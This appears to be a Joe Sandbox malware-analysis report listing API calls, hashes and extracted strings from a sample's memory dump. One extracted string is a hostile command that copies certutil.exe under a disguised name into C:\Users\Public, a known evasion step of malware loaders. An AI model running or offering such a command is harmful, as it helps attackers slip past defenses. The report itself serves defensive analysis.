                                                                                                    • Part of subcall function 00007FF7823D58D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823D5943
                                                                                                    • Part of subcall function 00007FF7823D58D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823D5956
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValueVersion
                                                                                                  • String ID: %d.%d.%05d.%d
                                                                                                  • API String ID: 2996790148-3457777122
                                                                                                  • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                  • Instruction ID: e56743e282bb318ad22fd6bec8f89c0f0af2c7536d02760ef7d7ff5c7319ce8a
                                                                                                  • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                  • Instruction Fuzzy Hash: 08F0A762A0838197D350AF16B44006AEB51FB84781FA04138D94D07F59CF7CD554CB50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$ErrorFileFindFirstLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 2831795651-0
                                                                                                  • Opcode ID: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                                                                                  • Instruction ID: 7155248cc791c010b70470c46e7c386fb314711901b55eb81a3c6a0ea2c96510
                                                                                                  • Opcode Fuzzy Hash: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                                                                                  • Instruction Fuzzy Hash: 83D1F676A08682A6E760EF21E4602BAB7A0FB44795FB01179DE4D07F98DFBCD445C710
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00007FF7823D7DA1
                                                                                                    • Part of subcall function 00007FF7823E417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E41AD
                                                                                                    • Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
                                                                                                    • Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
                                                                                                    • Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C
                                                                                                  • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D7EB7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                                  • String ID:
                                                                                                  • API String ID: 168394030-0
                                                                                                  • Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                                                                                  • Instruction ID: ecfbc78a63e528ead967b5d63eddff99ed1ed1b30471f1088bd620fb4aacef92
                                                                                                  • Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                                                                                  • Instruction Fuzzy Hash: B6A12865B08642A5FB65EB25D8242B9A392FF84785FE04178D90D47EE4DFBCE849C320
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InformationQueryToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 4239771691-0
                                                                                                  • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                  • Instruction ID: 284ce42c6d18dc830aff3cae901e1b4dc6fb0a8d290c9bb71124bef81289b538
                                                                                                  • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                  • Instruction Fuzzy Hash: 1A115276A18781DBEB109F01E4003A9FBA4FB85796F904175DB4802AA4DBBDE588CB50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileInformation$HandleQueryVolume
                                                                                                  • String ID:
                                                                                                  • API String ID: 2149833895-0
                                                                                                  • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                  • Instruction ID: 6eed077d4d6ff4432fb33a58dff32f921cac640f0d099a7565ee71823a3d4861
                                                                                                  • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                  • Instruction Fuzzy Hash: F7118F22A0878186E7609B51F4407AAE7A0FB44B45F904575DA8D43E54DBFCD48DDB10
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
                                                                                                    • Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
                                                                                                    • Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C
                                                                                                  • towupper.MSVCRT ref: 00007FF7823D85D4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                                  • String ID:
                                                                                                  • API String ID: 3520273530-0
                                                                                                  • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                  • Instruction ID: 6706f62d72011cecd0b09ca25b44a11e22d28888155ff1b9b610b52c715a7cee
                                                                                                  • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                  • Instruction Fuzzy Hash: 28610561A0C202A1F7657F24D52837CA2A2FF04755FA0417ADA1E56ED5DFBCE885C331
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InformationQueryToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 4239771691-0
                                                                                                  • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                  • Instruction ID: 9d9e061e0de40434170c9bc62c653c6384da9c94aea7b568a1df533b82248515
                                                                                                  • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                  • Instruction Fuzzy Hash: BEF0A0B3B04B81CBC7008F64E08849CBB78F704B84BA5843ACB2C03704DBB1D9A4CB50
                                                                                                  APIs
                                                                                                  • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E93BB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                  • String ID:
                                                                                                  • API String ID: 3192549508-0
                                                                                                  • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                  • Instruction ID: 5bc22195d5c49c940fbc64b3952c9c6ffd7bc7490bcfa8627a83486847190ee3
                                                                                                  • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                  • Instruction Fuzzy Hash: E6B01254F25402E1D708BB72DC9106557A07F5C712FE00471C00E82570DE9CD5DFCB20
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7823DF52A,00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF8DE
                                                                                                  • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF8FB
                                                                                                  • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF951
                                                                                                  • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF96B
                                                                                                  • wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DFA8E
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823DFB14
                                                                                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DFB2D
                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DFBEA
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823DF996
                                                                                                    • Part of subcall function 00007FF7823E0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7823F849D,?,?,?,00007FF7823FF0C7), ref: 00007FF7823E0045
                                                                                                    • Part of subcall function 00007FF7823E0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7823FF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823E0071
                                                                                                    • Part of subcall function 00007FF7823E0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E0092
                                                                                                    • Part of subcall function 00007FF7823E0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823E00A7
                                                                                                    • Part of subcall function 00007FF7823E0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E0181
                                                                                                  • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823ED401
                                                                                                  • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823ED41B
                                                                                                  • longjmp.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823ED435
                                                                                                  • longjmp.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823ED480
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                  • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                  • API String ID: 3964947564-518410914
                                                                                                  • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                  • Instruction ID: e1df0e3f0cde2994c1b9fb7916e432905cb1a0b2b9e88552968116e73ac4ca0a
                                                                                                  • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                  • Instruction Fuzzy Hash: CC02BE25A19A069AFB14BB21E8641B8F6A4FF44757FF04179D90E43AE4DFBCA844C730
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp$iswspacewcschr
                                                                                                  • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                  • API String ID: 840959033-3627297882
                                                                                                  • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                  • Instruction ID: bb0e50cd9920d0f5e81fb02391afb665f856d809f670bac543ce4c8103cfdb7e
                                                                                                  • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                  • Instruction Fuzzy Hash: BAD17D25A0864396FB50BB21E4242B9BAA0FF44B46FF44079D94D47A95DFBCE849CB30
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp$EnvironmentVariable
                                                                                                  • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                  • API String ID: 198002717-267741548
                                                                                                  • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                  • Instruction ID: 81dce35f078de9de8548cd1d8424c466a29977f0982f50db8c9ed547376c9713
                                                                                                  • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                  • Instruction Fuzzy Hash: ED512F25A0864395E6507F12E820179EBA0FF59B82FE49079D90E53A65DFBCE448C770
                                                                                                  APIs
                                                                                                  • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF000
                                                                                                  • wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF031
                                                                                                  • iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF0D6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: iswdigitiswspacewcschr
                                                                                                  • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                  • API String ID: 1595556998-2755026540
                                                                                                  • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                  • Instruction ID: fbc8f7448039f819c41ba7784a869135ce78cc80f9b59a8e4388052ce38108d4
                                                                                                  • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                  • Instruction Fuzzy Hash: 5522BD69E1C65281FA607B12A4A8279F6A0BF04793FF4417AD94D43AE4CFBCE845C731
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                  • String ID: "$=,;
                                                                                                  • API String ID: 3545743878-4143597401
                                                                                                  • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                  • Instruction ID: 571098adb341530978b79eb45e1e2b674326e52859c03c4e449c667151526290
                                                                                                  • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                  • Instruction Fuzzy Hash: BAC1C566E0965681EB657F11D024379FAA1FF44F46FE580B9CE4E03B94EFBCA845C220
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
